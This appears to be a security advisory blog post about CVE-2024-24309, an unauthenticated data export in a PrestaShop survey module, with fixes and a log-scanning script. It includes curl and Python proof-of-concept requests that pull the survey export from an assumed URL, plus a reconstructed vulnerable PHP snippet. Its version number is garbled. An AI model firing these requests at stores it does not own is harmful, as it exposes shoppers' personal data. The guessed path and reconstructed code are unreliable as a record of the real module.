Warning: If you run the Survey TMA module (ecomiz_survey_tma) for PrestaShop at version 2.. or below, the survey answers your shoppers submitted can be downloaded by anyone on the internet. This report covers what you need to know: how CVE-2024-24309 is exploited, sample code, references, and why an immediate update or mitigation is critical.

What Is CVE-2024-24309?

CVE-2024-24309 is a vulnerability in the "Survey TMA" module (ecomiz_survey_tma) for PrestaShop stores. On an unpatched store, anyone, without logging in, can download the information collected through site surveys. An unauthenticated export of personal data is a reportable breach under privacy laws such as GDPR, which means angry customers and potential fines.

Reference:
- NVD CVE record
- French VDB Advisory

What gets exposed is whatever your surveys stored, including shoppers' answers to any custom questions you ask.

This vulnerability lets any guest, including an automated scanner, fetch that data directly. No login is required and no permission check runs: one plain HTTP request and a copy of your users' information leaves the server.

Simple Breakdown

The Survey TMA module serves survey data through a controller, a PHP script inside the module. The problem is that the export action never checks whether the caller is an authenticated back-office employee with permission to see the results.

Anyone who knows or guesses the controller's URL and parameters therefore receives the entire export, typically as a CSV or Excel file.

Proof of Concept (PoC) Exploit

Before testing: only run this against a store you own or are explicitly authorised to test. Do not attack random servers!

The path below assumes a default PrestaShop install and the module's default controller location; the exact path is the author's assumption, so adjust it to whatever your store actually serves. Note also that PrestaShop normally dispatches module front controllers through index.php?fc=module&module=<module>&controller=<controller>, so a 404 on the direct file path alone does not prove the export is unreachable.

curl -sS -D - -o /tmp/survey_export.csv 'https://YOUR-PRESTASHOP-SITE/modules/ecomiz_survey_tma/controllers/front/export.php?action=export'

The -D - option prints the response headers. A 200 with a Content-Disposition: attachment header, plus a non-empty /tmp/survey_export.csv, means the store is exposed.

Or, sending the same request from Python:

import requests

# The controller path is the author's assumption; adjust it to your install.
url = 'https://YOUR-SITE/modules/ecomiz_survey_tma/controllers/front/export.php?action=export'

# No cookies and no session: this is exactly what an anonymous visitor sends.
resp = requests.get(url, timeout=10)
if resp.ok:
    print("Data dumped!")
    print("Content-Type:", resp.headers.get("Content-Type"))
    print(resp.text[:500])  # Only print the first 500 chars for the demo
else:
    print(f"Failed: {resp.status_code}")

You can also open the URL directly in a browser without logging in. If the bug is present you get a file download containing all survey responses, with no password or special permission needed.

Vulnerable Code Examination

What the module's export controller likely looks like (a simplified reconstruction for clarity, not the vendor's actual source):

// modules/ecomiz_survey_tma/controllers/front/export.php (reconstructed)

require_once(dirname(__FILE__).'/../../../../config/config.inc.php');
require_once(dirname(__FILE__).'/../../../../init.php');

// No authentication, token or permission check of any kind:
// the only condition is a query-string parameter anyone can supply.
if ($_GET['action'] === 'export') {
    // Fetch every survey response in the database
    $data = Db::getInstance()->executeS('SELECT * FROM '._DB_PREFIX_.'ecomiz_survey_responses');

    // Stream it back as a CSV attachment to whoever asked
    header('Content-type: text/csv');
    header('Content-Disposition: attachment; filename="responses.csv"');
    foreach ($data as $row) {
        echo implode(',', $row)."\n";
    }
    exit;
}
// ...rest of the code
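One way to close the hole, as an added example that is not Ecomiz's actual fix and not code from the module: move the export into a back-office controller so that PrestaShop's own employee login, admin token and profile-permission checks run before a single row is read. It is written for PrestaShop 1.7; the controller name, tab name and table name are assumptions that follow the reconstructed snippet above.

```php
<?php
// Added example, not the vendor's code. Assumes PrestaShop 1.7.x; the controller name,
// tab name and table name are hypothetical, matching the reconstructed snippet above.
//
// modules/ecomiz_survey_tma/controllers/admin/AdminEcomizSurveyExportController.php
class AdminEcomizSurveyExportController extends ModuleAdminController
{
    public function __construct()
    {
        $this->bootstrap = true;
        // AdminController::init(), run by Controller::run() before postProcess(),
        // redirects anonymous callers to the login page and rejects requests whose
        // ?token= does not match the employee's token for this controller.
        parent::__construct();
    }

    public function postProcess()
    {
        // Authorisation, not just authentication: the employee's profile must have
        // "view" on this tab (on 1.6 use $this->tabAccess['view'] instead).
        if (!$this->access('view')) {
            header('HTTP/1.1 403 Forbidden');
            exit('Access denied');
        }

        $rows = Db::getInstance()->executeS(
            'SELECT * FROM `'._DB_PREFIX_.'ecomiz_survey_responses`'
        );

        // Leave an audit trail of who exported personal data.
        PrestaShopLogger::addLog(
            'Survey export by employee #'.(int) $this->context->employee->id, 1
        );

        header('Content-Type: text/csv; charset=utf-8');
        header('Content-Disposition: attachment; filename="responses.csv"');
        header('X-Content-Type-Options: nosniff');

        // fputcsv() quotes commas, quotes and newlines, unlike implode() in the original.
        $out = fopen('php://output', 'w');
        if (!empty($rows)) {
            fputcsv($out, array_keys($rows[0]));   // header row
            foreach ($rows as $row) {
                fputcsv($out, $row);
            }
        }
        fclose($out);
        exit;
    }
}

// ---- Called from the module's install(): register the hidden tab that binds the
// ---- controller to the module and to the back-office permission system.
function installSurveyExportTab(Module $module): bool
{
    $tab = new Tab();
    $tab->class_name = 'AdminEcomizSurveyExport';   // must match the controller class name
    $tab->module = $module->name;
    $tab->id_parent = -1;                            // -1: no menu entry, permissions still apply
    $tab->active = 1;
    foreach (Language::getLanguages(false) as $lang) {
        $tab->name[(int) $lang['id_lang']] = 'Survey export';
    }
    return (bool) $tab->add();
}

// ---- Building the download link (for example on the module's configuration page).
// ---- getAdminLink() appends the per-employee token that init() later verifies.
function surveyExportLink(Context $context): string
{
    return $context->link->getAdminLink('AdminEcomizSurveyExport');
}
```

With the action behind the admin controller, the direct front URL from the PoC should no longer exist at all: deleting the old front controller file is part of the fix, not optional, because a forgotten copy keeps serving the unauthenticated export.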

Update Immediately!

1. Update the module. Check for a fixed release at Ecomiz PrestaShop Addons and install it; if no fix is available yet, disable the module until one is.

2. Until the update is in place, block direct web access to the export controller. With Apache, put a .htaccess file containing the following in the module's controllers/front/ directory (or an equivalent <Files> block in the vhost configuration):

Deny from all

On Apache 2.4 without mod_access_compat the equivalent is "Require all denied". This only covers the direct file path; if the export is also reachable through PrestaShop's module dispatcher (index.php?fc=module&module=ecomiz_survey_tma&controller=<controller>), disabling the module is the safer mitigation.

3. Contact Developer/Support: ask Ecomiz whether your installed version is affected and for the fixed release.

Checklist:

- [ ] Is your Survey TMA version >2..?
- [ ] Have you removed any public access to /modules/ecomiz_survey_tma/controllers/front/export.php?
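The checklist tells you whether the endpoint is closed now; it does not tell you whether the data already left. The following is an added example, not part of the original post, that scans an Apache or Nginx combined-format access log for completed survey downloads by guests. The module directory is the real one; the export path in the sample lines is the hypothetical path used in the PoC above, and the log lines are constructed, not real traffic.

```php
<?php
// Added example (not from the original post): find successful bulk downloads from the
// module's directory in a combined-format access log.
// Usage: php hunt_survey_export.php /var/log/apache2/access.log
// With no argument the constructed sample lines at the bottom are scanned.

const MODULE_DIR = '/modules/ecomiz_survey_tma/';   // the module's real web directory
const MIN_BYTES  = 1024;                            // a non-empty CSV; tune to your store

// Combined log format: ip - user [time] "METHOD path HTTP/x" status bytes "referer" "ua"
const LOG_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)/';

function parseLine(string $line): ?array
{
    if (!preg_match(LOG_RE, $line, $m)) {
        return null;                        // not a request line we understand
    }
    return [
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'path'   => $m[4],
        'status' => (int) $m[5],
        'bytes'  => $m[6] === '-' ? 0 : (int) $m[6],
    ];
}

/** True when the request looks like a completed bulk download from the module. */
function isSuspiciousExport(array $r): bool
{
    return strpos($r['path'], MODULE_DIR) === 0   // anything under the module directory
        && $r['status'] === 200                   // the server actually served it
        && $r['bytes'] >= MIN_BYTES;              // and it was more than an error page
}

function scan(iterable $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        $r = parseLine(trim($line));
        if ($r !== null && isSuspiciousExport($r)) {
            $hits[] = $r;
        }
    }
    return $hits;
}

// Constructed sample lines (not real traffic). Only the first one should be reported:
// the CSS hit is too small, the second export attempt was blocked (403), the last is unrelated.
$sample = [
    '203.0.113.7 - - [01/Mar/2024:03:14:07 +0000] "GET /modules/ecomiz_survey_tma/controllers/front/export.php?action=export HTTP/1.1" 200 48213 "-" "python-requests/2.31.0"',
    '198.51.100.4 - - [01/Mar/2024:03:15:00 +0000] "GET /modules/ecomiz_survey_tma/views/css/front.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Mar/2024:03:16:22 +0000] "GET /modules/ecomiz_survey_tma/controllers/front/export.php?action=export HTTP/1.1" 403 199 "-" "curl/8.4.0"',
    '192.0.2.9 - - [01/Mar/2024:04:00:01 +0000] "GET /index.php?controller=product&id_product=3 HTTP/1.1" 200 23111 "-" "Mozilla/5.0"',
];

$lines = isset($argv[1]) ? new SplFileObject($argv[1]) : $sample;
foreach (scan($lines) as $hit) {
    printf("%s %s %s %d bytes -> %s\n",
        $hit['time'], $hit['ip'], $hit['method'], $hit['bytes'], $hit['path']);
}
```

Against the built-in sample this reports the single 48213-byte download from 203.0.113.7. A match on a real log tells you what was taken, when and by whom, which is the starting point for the breach-notification duties mentioned earlier; keep MODULE_DIR broad rather than the exact PoC path, because the real export may be served from a different file than the one assumed above.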

Final Thoughts

CVE-2024-24309 is a classic but critical access control flaw: missing authentication on a data export. Always ensure modules that handle customer data require both a valid login and the right permission for every export or download feature.

Stay updated and educate your tech team—small modules can have big impacts.


More Reading/References

- CVE-2024-24309 on NVD
- VulDB entry
- PrestaShop Security Best Practices
- Ecomiz Survey TMA Page

Please update or disable this module ASAP. Protect your customers and your business.

*Exclusive analysis written for you by an AI security enthusiast. Feel free to share with credit!*

Timeline

Published on: 02/23/2024 22:15:54 UTC
Last modified on: 08/01/2024 13:47:25 UTC